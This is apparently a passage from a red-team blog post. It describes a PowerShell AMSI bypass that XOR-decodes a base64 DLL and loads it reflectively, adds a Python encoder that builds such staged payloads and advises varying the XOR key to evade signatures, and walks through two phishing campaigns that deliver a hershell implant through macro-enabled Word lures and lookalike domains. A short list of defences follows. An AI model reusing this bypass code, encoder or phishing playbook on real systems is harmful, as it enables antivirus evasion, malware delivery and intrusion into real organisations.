64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64
,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64)

$f = @(64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,80,64,80,64,64,64,64,70,64,64,64,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,80,64,67,64,64,64,64,76,64,64,64,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,82,64,64,64,64,71,105,64,64,64,64,76,64,118,64,64,64,64,64,64,64,64,64,64,64,64,64,76,64,123,80,64,64,64,67,86,64,71,76,64,89,118,67,86,64,68,84,64,84,102,67,85,64,68,106,64,85,118,67,78,64,71,57,64,82,80,67,78,64,68,88,64,85,118,64,64,64,64,64,64,119,80,85,119,46,102,64,64,64,80,64,64,64,64,68,64,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,81,118,64,64,64,64,64,64,64,64,64,68,64,64,64,64,64,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,68,80,64,64,64,64,67,64,71,88,64,88,80,67,120,64,68,88,64,96,80,67,114,64,70,84,64,82,80,67,116,64,70,88,64,99,118,64,64,64,64,64,64,75,64,64,68,64,64,64,64,87,64,67,120,64,70,68,64,99,102,67,123,64,70,118,64,88,80,67,49,64,70,106,64,99,118,67,116,64,64,64,64,64,64,64,64,64,77,64,68,99,64,72,64,64,64,68,64,84,118,67,49,64,73,72,64,96,80,67,116,64,70,98,64,83,102,67,113,64,70,118,64,91,80,67,75,64,70,53,64,91,102,67,119,64,64,64,64,82,64,72,64,64,64,68,64,76,64,64,118,64,69,64,64,76,64,64,118,64,69,80,64,88,102,64,118,64,64,64,64,70,102,64,67,64,64,68,64,80,118,67,119,64,70,49,64,99,80,67,109,64,70,53,64,101,64,67,123,64,64,64,64,64,64,64,64,64,66,72,64,64,80,64,67,64,68,76,64,99,118,67,117,64,73,64,64,88,80,67,116,64,73,106,64,85,102,67,105,64,70,49,64,91,80,64,64,64,64,64,64,64,64,64,64,64,69,88,64,67,118,64,67,64,68,88,64,96,80,67,114,64,70,84,64,83,64,67,109,64,73,76,64,88,118,67,120,64,70,106,64,98,64,67,49,64,70,106,64,99,118,67,116,64,64,64,64,64,64,67,66,64,73,106,64,98,64,67,105,64,73,76,64,98,118,64,64,64,64,64,64,76,64,64,72,64,64,68,64,83,102
,67,113,64,70,118,64,91,80,67,86,64,70,84,64,98,102,67,123,64,70,106,64,99,118,67,116,64,64,64,64,64,64,64,121,64,66,53,64,76,64,64,116,64,69,64,64,77,102,64,118,64,64,64,64,79,102,64,77,64,64,68,64,82,80,67,116,64,73,80,64,91,80,67,120,64,70,53,64,88,80,67,114,64,68,53,64,88,80,67,117,64,70,84,64,64,64,67,66,64,73,106,64,98,64,67,105,64,73,76,64,98,118,64,116,64,70,80,64,99,64,67,114,64,64,64,64,64,64,67,72,64,67,72,64,64,80,67,76,64,70,84,64,91,118,67,105,64,70,118,64,80,118,67,119,64,73,64,64,100,80,67,120,64,70,106,64,91,118,67,110,64,73,80,64,64,64,67,69,64,70,57,64,98,64,67,52,64,73,72,64,96,80,67,111,64,70,102,64,101,64,64,102,64,74,106,64,72,64,64,102,64,69,72,64,76,64,64,121,64,69,106,64,64,64,64,112,64,64,68,64,64,80,67,76,64,70,84,64,91,118,67,105,64,70,118,64,87,64,67,120,64,70,68,64,91,64,67,109,64,70,49,64,88,80,67,120,64,70,114,64,98,118,64,64,64,64,64,64,64,64,64,64,64,69,53,64,66,118,64,67,64,68,57,64,98,102,67,113,64,70,98,64,96,80,67,116,64,70,68,64,99,64,67,70,64,70,106,64,99,64,67,109,64,70,53,64,88,80,67,117,64,70,84,64,64,64,67,66,64,73,106,64,98,64,67,105,64,73,76,64,98,118,64,116,64,70,80,64,99,64,67,114,64,64,64,64,64,64,64,116,64,64,98,64,64,80,67,80,64,73,72,64)

$g = @(99,118,67,106,64,73,84,64,88,118,67,49,64,68,53,64,88,80,67,117,64,70,84,64,64,64,64,64,64,68,72,64,100,80,67,118,64,70,68,64,98,118,67,123,64,64,64,64,64,64,64,49,64,64,102,64,64,80,67,80,64,73,72,64,99,118,67,106,64,73,84,64,88,118,67,49,64,71,88,64,91,80,67,120,64,73,76,64,96,80,67,119,64,70,53,64,64,64,64,121,64,66,53,64,76,64,64,116,64,69,64,64,77,102,64,118,64,64,64,64,78,64,64,72,64,64,68,64,80,80,67,123,64,73,76,64,91,80,67,117,64,70,72,64,99,64,67,52,64,66,64,64,87,102,67,109,64,73,72,64,98,118,67,113,64,70,57,64,99,102,64,64,64,69,68,64,77,102,64,118,64,66,53,64,76,64,64,116,64,69,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,72,64,64,64,69,64,64,64,64,64,118,57,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64
,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,60,60)

$xorencrypted = $a + $b + $c + $d + $e + $f + $g
$decrypted = @()
foreach($byte in $xorencrypted){$decrypted += $byte -bxor 1 }
$base64string = [Text.Encoding]::UTF8.GetString($decrypted)
function Bypass-AMCEE { if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMCEE").Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String($base64string)) | Out-Null } [Bypass.AMCEE]::Subvert(); }
Bypass-AMCEE
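The attacker-side and on-target steps above form one encode/decode pipeline. The Python below is an added example, not code from the original post or from CyberArk: it reproduces the same pipeline (base64, XOR, split into $a..$g) with the post's key of 1, generalizes it to a multi-byte key and any chunk count, emits the PowerShell arrays together with a matching decoder loop, and decodes its own output so the round trip can be verified before anything is staged. The DLL bytes are a constructed placeholder rather than a real assembly, and the emitted PowerShell decoder is my own, written from the page's decoder and to be tested on a real host before use.

```python
"""Encoder/decoder for the XOR-and-chunk staging used in the AMSI bypass above.

Added example, not code from the original post or from CyberArk. The post XORs
the base64 of the DLL with key 1 and splits the result into seven arrays
($a..$g) to stay under PowerShell line-length limits; this does the same with
any key length and chunk count, and mirrors the on-target decoder.
"""
import base64

# Constructed stand-in for bypass.dll: an "MZ" header followed by filler bytes.
PLACEHOLDER_DLL = b"MZ\x90\x00" + bytes(range(256)) * 4


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR each byte with the repeating key (key b"\\x01" reproduces the post)."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_payload(dll_bytes: bytes, key: bytes, chunks: int) -> list:
    """Attacker side: base64 -> XOR -> split into exactly `chunks` integer arrays."""
    b64 = base64.b64encode(dll_bytes)        # same bytes as [Convert]::ToBase64String
    enc = xor_bytes(b64, key)
    n = len(enc)
    return [list(enc[i * n // chunks:(i + 1) * n // chunks]) for i in range(chunks)]


def decode_payload(arrays: list, key: bytes) -> bytes:
    """On-target side: concatenate, XOR back, base64-decode to the original DLL bytes."""
    enc = bytes(b for arr in arrays for b in arr)
    return base64.b64decode(xor_bytes(enc, key), validate=True)


def to_powershell(arrays: list, key: bytes) -> str:
    """Emit the $a..$z arrays plus a decoder loop that handles a multi-byte key.

    The decoder lines are an assumption of this example, not the post's script.
    """
    if len(arrays) > 26:
        raise ValueError("at most 26 chunks for single-letter variable names")
    names = [chr(ord("a") + i) for i in range(len(arrays))]
    lines = [f"${nm} = @({','.join(str(b) for b in arr)})" for nm, arr in zip(names, arrays)]
    lines.append(f"$key = @({','.join(str(b) for b in key)})")
    lines.append("$xorencrypted = " + " + ".join(f"${nm}" for nm in names))
    lines.append("$decrypted = New-Object byte[] $xorencrypted.Length")
    lines.append("for ($i = 0; $i -lt $xorencrypted.Length; $i++) "
                 "{ $decrypted[$i] = $xorencrypted[$i] -bxor $key[$i % $key.Length] }")
    lines.append("$base64string = [Text.Encoding]::UTF8.GetString($decrypted)")
    return "\n".join(lines)
```

With key 1 and seven chunks the first four emitted integers are 85,87,112,80, the same opening as the $a array above, because both are the base64 prefix TVqQ of an MZ header XORed with 1. That is also why a single-byte XOR of a known file is weak as obfuscation: the transformed header is constant and easy to signature, which is the reason to vary the key per build.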


## Campaign 1: a fake company submitting a targeted form
We emailed the target to enquire about new business and put up a company page on our domain with a business similar to theirs. After Dropbox and other file-hosting services failed to deliver the payload, we settled on mixmax.com, which also tracks who clicked the file.
The email sent to the sales representative:

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221205526.png)

The malicious Word document, which tells the user that macros are needed for it to load correctly:

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221205546.png)

Once macros are enabled, our hershell implant is dropped.

## Campaign 2: mass mailing
Because our campaign ran over the New Year we used that as the pretext and imitated an employee recognition program, http://appreciatehub.com/. Our own domain was http://appreciateservices.com/, and anyone visiting it was redirected to the real site, http://octanner.com/. Doing this for long can get your own domain categorized as malicious, so cloning the site is better. The e-cards were personalized with a sample picture of the recipient.

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221210229.png)

We put the greeting video in a Word document that requires a macro to play it.

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221210312.png)

The nginx rule that serves the document as a download:

```
location /receivedECard {
    alias /var/www/html/HappyNewYear2019.docm;
    add_header Content-Disposition 'attachment; filename="Happy New Year 2019.docm"';
}
```

Initial access obtained.

How the blue team can defend

  • Disable macros
  • Don't accept mail from untrusted sources
  • Open attachments in a virtual machine
  • Security awareness training
  • Tighten inbox rules

Summary

From an attacker's point of view phishing is harder than it was a few years ago, but on a short timeline it is still a good option and the workload is not large. Most of the time goes into building the payload; once an attacker has a working playbook, campaigns become fast and frequent.
